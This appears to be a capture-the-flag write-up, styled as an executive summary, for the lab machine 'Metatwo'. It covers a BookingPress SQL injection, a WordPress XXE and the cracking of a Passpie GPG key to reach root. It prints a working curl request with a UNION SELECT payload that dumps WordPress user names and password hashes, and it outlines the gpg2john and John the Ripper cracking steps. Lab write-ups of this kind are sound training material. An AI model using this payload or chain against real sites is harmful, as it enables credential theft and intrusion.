Executive Summary
The purpose of this executive summary is to provide an overview of the security vulnerabilities identified in Metatwo, including the Booking Press plugin (version 1.0.10) and the WordPress core version 5.6.2. Additionally, the summary highlights the subsequent exploitation of these vulnerabilities, leading to unauthorized access and disclosure of sensitive information, including user credentials and root passwords.
- Booking Press Plugin (version 1.0.10) Unauthenticated SQL Injection Vulnerability (CVE-2022-0739): A critical security vulnerability, CVE-2022-0739, has been identified in the Booking Press plugin (version 1.0.10) for WordPress. This vulnerability allows attackers to execute SQL injection attacks without authentication, granting them unauthorized access to the system. Specifically, the attacker can exploit this vulnerability to exfiltrate sensitive data such as usernames and passwords from the wp_users table. In this instance, the attacker successfully cracked the password for the “manager” user account, subsequently using these credentials to gain access to the WordPress administrative page.
- WordPress Core version 5.6.2 XML External Entity (XXE) Vulnerability (CVE-2021-29447): An XML external entity vulnerability, CVE-2021-29447, has been discovered in WordPress core version 5.6.2. Exploiting this vulnerability, an attacker can craft a malicious payload within a fake WAV format file. By uploading and processing this file, sensitive information contained in the wp-config.php file can be exfiltrated. In this particular scenario, the attacker successfully extracted the credentials of the “jnelson” user account, subsequently utilizing these credentials to log in via SSH.
- Privilege Escalation: Exfiltration of Passpie Private Key and Root Password Disclosure: Using the compromised “jnelson” user account, the attacker was able to exfiltrate the Passpie private key. With the key in hand, the attacker employed a password cracking technique to decipher the passphrase associated with the key. This successful decryption exposed the root password for the Metatwo system.
Payloads used to obtain loots
Booking Press plugin version 1.0.10 has an unauthenticated SQL Injection Vulnerability in http://metapress.htb/wp-admin/admin-ajax.php in the total_service variable of the data. The following payload can exfiltrate the password hash of admin and manager, however only manager’s password hash can be cracked by our existing dictionary.
curl -i -s -k -X $'POST' \
-H $'Host: metapress.htb' -H $'User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: application/json, text/plain, */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 196' -H $'Origin: http://metapress.htb' -H $'Connection: close' -H $'Referer: http://metapress.htb/events/' \
-b $'PHPSESSID=em6lrfqsb9k6bmqn2j8lgfvhb6' \
--data-binary $'action=bookingpress_front_get_category_services&category_id=1&total_service=1) union select sleep(5),@@version,user_login,null,user_pass,null,null,null,null from wp_users-- aaa&_wpnonce=668db70df1' \
$'http://metapress.htb/wp-admin/admin-ajax.php'
WordPress version 5.6.2 has a XXE vulnerability which can be exploited to exfiltrate information. The payload generation can be found at https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
The send_email.php has “jnelson” credential which can be used to ssh to Metatwo.
Passpie is a password manager which stores jnelson and root passwords, in order to see the password in plaintext I need to know the passphrase when I do an export passpie export ~/passfile.txt
I logon sftp with jnelson’s account, and because jnelson’s account is not jailed within certain directory, I am able to freely browse the directory and download the .keys file.
The .keys file contains the public and private key pair, I need to extract only the private key block and use gpg2john to convert to a hash, then use John the ripper to crack the hash: gpg2john <original private key> <output hash filename>
, in my case <output hash filename> is privatekeyhash.